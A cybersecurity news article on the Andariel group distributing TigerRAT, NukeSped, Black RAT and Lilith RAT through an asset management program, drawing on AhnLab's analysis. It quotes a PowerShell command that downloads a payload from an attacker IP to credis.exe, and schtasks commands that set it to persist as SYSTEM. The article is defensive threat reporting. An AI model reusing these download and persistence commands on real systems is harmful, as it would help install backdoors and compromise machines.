Sunday, May 25, 2025
HomeCyber Security NewsHackers Exploit Asset Management Program to Deploy Malware

Hackers Exploit Asset Management Program to Deploy Malware

Published on

SIEM as a Service

Follow Us on Google News

The Andariel group has been identified in recent reports as distributing malware through asset management programs. This group has been previously discovered to be in a relationship with the Lazarus group.

The Andariel group is known to launch supply chain, spear phishing, or watering hole attacks as part of their initial access.

The group’s recent targets were Log4Shell and Innorix agents, which were targeted for attacking several corporate sectors in South Korea. In another case, the MS-SQL server was also identified to be targeted for malware attack. 

- Advertisement - Google News

The malware used for attacks includes TigerRAT, NukeSped variants, Black RAT, and Lilith RAT. Similar to their previous attacks, their primary targets were South Korean communications companies and semiconductor manufacturers.

Document
Free Webinar

Live API Attack Simulation Webinar

In the upcoming webinar, Karthik Krishnamoorthy, CTO and Vivek Gopalan, VP of Products at Indusface demonstrate how APIs could be hacked. The session will cover: an exploit of OWASP API Top 10 vulnerability, a brute force account take-over (ATO) attack on API, a DDoS attack on an API, how a WAAP could bolster security over an API gateway

Hackers Exploit Asset Management Program

Initial Access

In one case, an asset management program was targeted, which was identified with several logs.

This program was installed with Andariel group’s malware, which used the below PowerShell command for downloading the malware by using the mshta.exe process.

Powershell command used (Source: AhnLab)
Powershell command used (Source: AhnLab)

PowerShell command: wget hxxp://109.248.150[.]147:8585/load.png -outfile C:\Users\public\credis.exe

Malware Used in Attacks

Some of the most used backdoors installed were TigerRAT, Black RAT, and NukeSped.

However, in recent attacks, an Open source malware named Lilith RAT was used. In other cases, malware developed in the Go language was also discovered. 

TigerRAT

This malware supports various features like uploading and downloading files, executing commands, collecting basic information, keylogging, taking screenshots, and port forwarding.

This backdoor has an authentication process during initial communications, making it different from other backdoors.

Golang Downloader

This malware contains a simple structure that connects the C&C server and installs an additional payload.

It also used Base64 encryption during its communication with the C2 server. This Golang downloader is used to download and install malware like TigerRAT and variants of NukeSped.

NukeSped Variants, Black RAT, and Lilith RAT

NukeSped is a backdoor receiving commands from the C2 server and controlling the affected system.

This backdoor sends a packet using the POST method during initial communications with the C2 server and also sends the results of the executed commands to the server using a GET method.

Black RAT is another backdoor developed in the Go Language which doesn’t have any source code information that was used in recent attacks.

However, Lilith RAT was an open-source malware that was developed in C++ and published on GitHub. 

It consists of various features that can be used to perform remote code execution, maintain persistence, and auto-delete.

Post Infection

Once the backdoors have been installed on the system, they execute the following commands to register them on the task scheduler to maintain persistence. 

> schtasks /delete /tn “microsoft\******” /f
> schtasks /create /tn “microsoft\******” /tr “c:\users\%ASD%\credis.exe” /sc onlogon /ru system
> schtasks /run /tn “microsoft\windows\mui\route”

Post this; additional commands are used to look up the information on the infected system and remove the downloader malware or terminate other processes.

The backdoor also collects information and offers the capabilities for a threat actor to download and use hacking tools for stealing credentials or password recovery. 

A complete report about this threat actor and the malware used has been published by AhnLab, providing detailed information about the source code, commands, and others.

Experience how StorageGuard eliminates the security blind spots in your storage systems by trying a 14-day free trial.

Eswar
Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Latest articles

Zero-Trust Policy Bypass Enables Exploitation of Vulnerabilities and Manipulation of NHI Secrets

A new project has exposed a critical attack vector that exploits protocol vulnerabilities to...

Threat Actor Sells Burger King Backup System RCE Vulnerability for $4,000

A threat actor known as #LongNight has reportedly put up for sale remote code...

Chinese Nexus Hackers Exploit Ivanti Endpoint Manager Mobile Vulnerability

Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager...

Hackers Target macOS Users with Fake Ledger Apps to Deploy Malware

Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Zero-Trust Policy Bypass Enables Exploitation of Vulnerabilities and Manipulation of NHI Secrets

A new project has exposed a critical attack vector that exploits protocol vulnerabilities to...

Threat Actor Sells Burger King Backup System RCE Vulnerability for $4,000

A threat actor known as #LongNight has reportedly put up for sale remote code...

Chinese Nexus Hackers Exploit Ivanti Endpoint Manager Mobile Vulnerability

Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager...